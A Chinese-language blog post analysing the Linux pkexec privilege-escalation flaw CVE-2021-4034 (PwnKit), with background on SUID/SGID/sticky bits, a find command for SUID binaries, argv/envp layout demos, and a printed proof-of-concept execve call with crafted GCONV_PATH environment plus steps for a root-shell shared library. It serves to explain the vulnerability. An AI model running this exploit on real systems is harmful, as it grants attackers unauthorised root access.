CVE-2021-4034漏洞原理解析

这篇具有很好参考价值的文章主要介绍了CVE-2021-4034漏洞原理解析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

本篇文章主要叙述CVE-2021-4034漏洞,该漏洞影响的linux发行版众多,例如:Ubuntu、CentOS、Debian等等,该漏洞为Linux系统本地提权漏洞,利用脚本已经公开,利用简单且稳定,脚本地址:Github

当攻击者获取目标系统普通用户权限时,利用该脚本即可直接获得root权限,该漏洞的主要原因是因为polkit中的pkexec程序对参数个数判断不佳,导致数组溢出,具体分析过程将在下面慢慢介绍。首先得先了解下suid、sgid、sbit的特殊权限,将对后面分析起到帮助,也对后续的渗透学习开辟一些新鲜道路。

一、SUID、SGID、SBIT的介绍

suid、sgid、sbit是文件权限管理的特殊命令,基本的Linux权限为9个,分别为rwx rwx rwx,利用命令ll -a 加文件路径会发现有一些特殊的权限位符号。例如:
CVE-2021-4034漏洞原理解析
这里有一个特殊权限位:s
Linux有十二个权限符

属主 属组 其他人 用户位 用户组 其他用户
rwx rwx rwx suid sgid sbit
  1. SUID的基本权限位有x权限,标识符为s,代表数字为4,生效对象为用户位
  2. SGID的基本权限位有x权限,标识符为s,代表数字为2,生肖对象为用户组位
  3. SBIT的基本权限位有x权限,标识符为t,代表数字为1,生效对象为其他用户

1)SUID权限位

  1. suid通过s字符标识判定,当s出现在文件所有者的x权限时,如上图/usr/bin/passwd文件,状态位:-rwsr-xr-x,此时就可以判定为时suid。
  2. suid权限仅对二进制程序有效
  3. 该权限仅在执行该程序的过程中有效
  4. 执行者将拥有该程序拥有者的权限

SUID的目的:为了让本来没有相应权限的用户运行这个程序,可以短暂的享有该程序拥有者的权限。就比如上方图例,/usr/bin/passwd该二进制程序是用来修改密码的,但是linux系统中用户众多,有root、普通用户等等,这些用户都需要在特殊情况修改密码,比如在忘记登录密码时

具体流程

  1. 因为passwd的权限对任何用户都是可执行的,所以系统中不管什么用户都可执行
  2. passwd文件的拥有者是属于root
  3. 当普通用户在执行passwd命令时,会在执行期间短暂拥有root权限
  4. 普通用户借助root权限修改了/etc/shadow文件
  5. 最后把密码修改成功
  6. 这时候,在攻击者的角度,就可以利用此类拥有者为root的二进制程序,提权成功
  • 当在渗透过程中获取了shell,可以使用find命令查询系统上所有的s权限位文件,命令:
    find / -perm -4000 -type f -ls
参数解释:
-perm:利用权限进制搜索
-type:指定文件类型(l:软连接类型;d:文件夹类型;f:文件类型)
-ls:搜索的数据进行格式化输出
-delete:对匹配的数据进行删除

2)SGID权限位

CVE-2021-4034漏洞原理解析

  1. sgid和suid差不多,先查看s是否在所属用户组的x位置上,如果在,那就是sgid
  2. sgid获得该程序所属用户组的权限
  3. sgid仅对二进制程序有用
  4. sgid主要用在目录上
  • :sgid,如果用户在此目录下具有w,写的权限的话,若使用者在此目录下建立新文件,则新文件的群组与此目录的群组相同。

3)SBIT权限位

  1. sbit主要针对other来设置的,和suid,sgid大同小异,只是功能上不同而已
  2. sbit只对目录有效,当用户在该目录下新建文件或目录时,仅自己和root才有权利删除
  3. 最具代表的就是/tmp目录,之前在渗透项目中,获得了webshell,都要先进到/tmp目录下进行一系列下载之类的操作,因为/tmp目录,任何人都可以增加、修改文件(权限为rwx)
  • :SBIT对文件不起作用

总结

符号类型改变权限 数字类型改变档案权限 用 ls -l 来查看
1. chmod u+s test-- 为test文件加上setuid标志 setuid位, 如果该位为1, 则表示设置setuid 4- - - rwsrw-r-- 表示有setuid标志
2.chmod g+s test-- 为test目录加上setgid标志 setgid位, 如果该位为1, 则表示设置setgid 2— rwxrwsrw- 表示有setgid标志
3.chmod o+t test-- 为test目录加上sticky标志 sticky位, 如果该位为1, 则表示设置sticky 1— rwxrw-rwt 表示有sticky标志

二、CVE-2021-4034

  • 这里是学习了看雪论坛的某位大佬对该漏洞的整体分析,然后自己理解进行叙述!实例也是该大佬的例子。

1)相关知识

1、实例代码:

#include<stdio.h>
int main(int argc, char** argv){
	printf("argc:%d\n", argc);
	for(int i;i<argc;i++){
		printf("%s\n",argv[i]);
	}
	return 0;
}
  • 上述代码中,argc是参数个数,argv是存放的具体参数,argv[0]—>程序本身,argv[1]—>第一个参数,argv[2]—>第二个参数,argv[argc],0表示结束。
    CVE-2021-4034漏洞原理解析
  • 当执行程序时,argc的取值至少为1,因为即使不加参数,argv[0]也要指向程序路径本身。pkexec在特殊情况下,如使用execve来调用程序,并给argv传值 NULL,则argc为0。
  • execve函数:
#include<unistd.h>
int execve(const char *pathname, char *const argv[], char *const envp[]);
  • execve.c:
#include<unistd.h>
int main(int argc, char **argv){
	return execve("./test", NULL, NULL);
}

CVE-2021-4034漏洞原理解析

  • :argv和envp在内存中的分布是连续的。
  • execve.c:
#include<unistd.h>
int main(){
	char* const argv[] = {
		"AAAAAA1111",
		"AAAAAA1111",
		"AAAAAA1111",
		NULL
	};
	char* const envp[] = {
		"AAAAAA1111",
		"AAAAAA1111",
		"AAAAAA1111",
		NULL
	};
	return execve("./test", argv, envp);
}
  • 利用execve调用test,将上述三个值分别传入argv和envp中
#include<stdio.h>
int main(int argc, char** argv)
{
    printf("argc: %d\n", argc);
    for(int i; i<8; i++) {
        if(argv[i]!=NULL) {
            printf("argv[%d]: %s\n", i, argv[i]);
        } else {
            printf("argv[%d]: NULL\n", i);
        }
    }
 
    return 0;
}

CVE-2021-4034漏洞原理解析

  • argc为3,加上截止符0,argv的大小为4,这里直接打印了8个值,显然是越界了,通过实例,表明argv与envp在内存布局上是连续的,envp紧跟argv之后。

具体分析过程请参考本文最后(大佬分析的特别完善,受益匪浅)

2)漏洞原理

本漏洞主要被利用的包括以下几点:

  1. pkexec为suid程序
  2. 当argc为0时,pkexec会读取argv[1]变量,而由于刚才实例分析,内存布局是连续的,因此实际上会读取到第一个环境变量。
  3. 读取到argv[1]之后,若其不是绝对路径,则pkexec会将其理解为相对路径,会在环境变量中查找PATH变量,将其转换为实际路径。
  4. 若PATH环境变量包含一个攻击者可控的路径,则pkexec转换后的实际路径将会是这个攻击者可控的路径下的一个子目录,则显然此实际路径也是攻击者可控的。例如:/bin/shPATH=/bin:/usr/bin
  5. pkexec会对argv[1]赋值,将其修改为上述得到的实际路径,但是argv[1]此时实际上指向的是pkexec的第一个环境变量,也就是说,pkexec将自己的第一个环境变量修改为这个实际路径了。
  6. pkexec会在程序运行过程中调用g_printerr函数,这个函数会在运行的时候按需载入GCONV_PATH环境变量指向的路径下的gconv-modules文件中写明的外部动态链接库(so),并运行其中的初始化函数gconv_init。

攻击者可以做以下操作提升至root权限:

#include <unistd.h>

int main(int argc, char **argv)
{
	char * const args[] = {
		NULL
	};
	char * const environ[] = {
		"pwnkit.so:.",
		"PATH=GCONV_PATH=.",
		"SHELL=/lol/i/do/not/exists",
		"CHARSET=PWNKIT",
		"GIO_USE_VFS=",
		NULL
	};
	return execve("/usr/bin/pkexec", args, environ);
}
  • 这是CVE-2021-4034的poc,将其复制到目标机器/tmp目录下,编译运行,赋权chmod u+s,然后执行即可利用suid特殊权限,获得root权限。

或者可以:

  • 在自己可控的目录下生成一个gconv-modules文件,并将文件内容设置为指向某个so文件。
  • 在so文件中实现gconv_init函数,此函数主要就是生成一个root shell(由于pkexec默认开启SUID),而在so库的此函数中,设置当前进程用户的uid为0,即可提权到root用户。
  • 调用pkexec,而且在调用的时候通过命令行参数设置使得pkexec得到的argc为0,将环境变量中的第一个设置为非/开头的一个相对路径,将环境变量中的PATH变量的值设置为GCONV_PATH=开头的字符串,使得对应的路径指向上述存储gconv-modules文件的路径。

3)影响版本

主要有:pkexec版本为0.105之前

  • Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
  • Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
  • Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1
  • Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
  • CentOS 6:polkit-0.96-11.el6_10.2
  • CentOS 7:polkit-0.112-26.el7_9.1

三、修复

目前各大linux发行版都给出了安全补丁,升级即可修复该漏洞。

漏洞参考:https://bbs.pediy.com/thread-271423.htm#msg_header_h2_6文章来源地址https://www.toymoban.com/news/detail-411355.html

到了这里,关于CVE-2021-4034漏洞原理解析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CVE-2021–26855与CVE-2021–27065漏洞分析及复现

    文章首发先知社区:https://xz.aliyun.com/t/10098 微软在上半年三月披露了关于Exchange邮件服务器 CVE-2021–26855 (SSRF)与 CVE-2021–27065 (任意文件写入)的漏洞,这两个漏洞配合可以造成未授权的webshell写入,是非常严重的高危漏洞。漏洞刚出来那会儿并未注意,正好前两天4哥在群里发了个关

    2024年02月07日
    浏览(42)
  • 漏洞修复--OpenSSH权限提升漏洞(CVE-2021-41617)

    官方已发布安全版本修复漏洞,腾讯安全专家建议受影响的用户请尽快更新至安全版本。 安全版本:OpenSSH 8.8 用户可根据所使用的发行版本,升级修复。 查看OpenSSH版本:rpm -qa | grep openssh 升级OpenSSL版本:yum -y install openssh centos7 用户,建议升级到如下版本:openssh-7.4p1-22.el7

    2024年02月15日
    浏览(41)
  • Weblogic漏洞 CVE-2021-2109 处理

    好记忆不如烂笔头,能记下点东西,就记下点,有时间拿出来看看,也会发觉不一样的感受. 目录 一、前言 二、影响版本 三、漏洞查阅 四、漏洞修复 4.1 补丁包下载  4.2 安装补丁包  4.3 具体操作 oracl 早就发布了weblogic的漏洞信息,但是因为各种原因没有及时处理(内网环境

    2024年02月04日
    浏览(47)
  • openssl升级解决CVE-2021-3711漏洞

    查看当前openssl版本 从官网下载最新版: https://www.openssl.org/source/ 开始备份+编译安装 备份 安装 开始替换 验证

    2024年02月11日
    浏览(46)
  • Nacos认证绕过漏洞(CVE-2021-29441)

    指纹识别 漏洞范围 nacos1.2.0版本-nacos1.4.0版本 漏洞复现 靶机ip:192.168.1.4 默认的nacos登录界面 利用如下请求包查看只有一个nacos用户 用如下请求包添加用户 再次查看我们的用户增加了tpaer用户 用新用户登录进行验证,成功未授权访问绕过验证 漏洞原理 官方给出的文档描述 开

    2024年02月07日
    浏览(40)
  • [漏洞修复]Docker runc容器逃逸漏洞(CVE-2021-30465)

    2021年5月31日,阿里云应急响应中心监测到国外安全研究人员披露 CVE-2021-30465 runc 符号链接挂载与容器逃逸漏洞。 针对该漏洞的整改过程。 runc是一个轻量级通用容器运行环境,它允许一个简化的探针到运行和调试的底层容器的功能,不需要整个docker守护进程的接口。 runc存在

    2024年02月12日
    浏览(41)
  • GoAhead远程命令执行漏洞(CVE-2021-42342)

    目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞主要是由于上传过滤器没有设置不受信任的var位绕过CGI处理程序的前缀检测,渗透人员可以利用这个漏洞在未授权的情况下,构造恶意程序数据执行远程命令执行攻击,进而获得服务器的最

    2024年02月09日
    浏览(41)
  • CVE-2021-41773/42013 apache路径穿越漏洞

    影响范围 CVE-2021-41773 Apache HTTP server 2.4.49 CVE-2021-42013 Apache HTTP server 2.4.49/2.4.50 漏洞原理 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: 当检测到路径中存在%字符时,如果紧跟的2个

    2024年02月08日
    浏览(39)
  • Nacos未授权访问漏洞(CVE-2021-29441)

    声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。加粗样式 Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平

    2024年02月07日
    浏览(58)
  • Sudo堆溢出漏洞(CVE-2021-3156)复现

    2021 年 1 月 26 日,Qualys Research Labs在 sudo 发现了一个缺陷。sudo 解析命令行参数的方式时,错误的判断了截断符,从而导致攻击者可以恶意构造载荷,使得sudo发生堆溢出,该漏洞在配合环境变量等分配堆以及释放堆的原语下,可以致使本地提权。 环境版本 • ubuntu 20.04 • su

    2024年02月11日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包